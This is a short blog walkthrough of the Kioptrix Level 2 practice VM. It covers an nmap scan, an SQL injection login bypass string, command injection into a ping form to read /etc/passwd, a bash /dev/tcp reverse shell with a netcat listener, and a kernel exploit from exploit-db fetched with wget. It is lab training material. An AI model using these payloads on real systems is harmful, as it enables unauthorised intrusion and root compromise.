[Hacking series] – Kioptrix level 2

Written by  on June 6, 2015 

Code name: Kioptrix2

Webpage: http://kioptrix.com/

VM Download: http://www.kioptrix.com/blog/dlvm/Kioptrix_Level_2.rar

Challange: Get root on the system

After booting the box we can find it with netdiscover and scan it with nmap

# nmap -Pn -A -p-

nmap scan gave us the following


Open ports: 22, 80, 111, 443, 631, 778, 3306

In these boxes port 80 is always an interesting port, let’s see what’s hidding.


It’s a web html-php based login form. We tried a few sql injection strings and methods to bypass the login, and we got this one working on the Username field

Administrator’ or 1=1 #


Then we moved to a “pingit” style page


It looks like we can use this page to perform a ping on some IP on the network. How will php do that? Will it use a php function like shell_exec()? Let’s see if we can inject something into that; cat /etc/passwd


Nice, after that, we can try to inject a reverse shell command. As netcat doesn’t seems to be in the system, we can try to use bash itself

On our kali Box:

#nc -lvp 9922

On the command form:;bash -i >& /dev/tcp/ 0>&1


We are in. Next step is to exploit the box. As the system seems to be outdated, we will try to exploit the kernel

# uname -a


After a quick research, we found that on the exploit database: https://www.exploit-db.com/exploits/9542/

We can compile the exploit on our kali box, then send it to the target box via http (wget)


# wget

And after running that…


Game over kioptrix2 P-)


Category : hacking series

Leave a Reply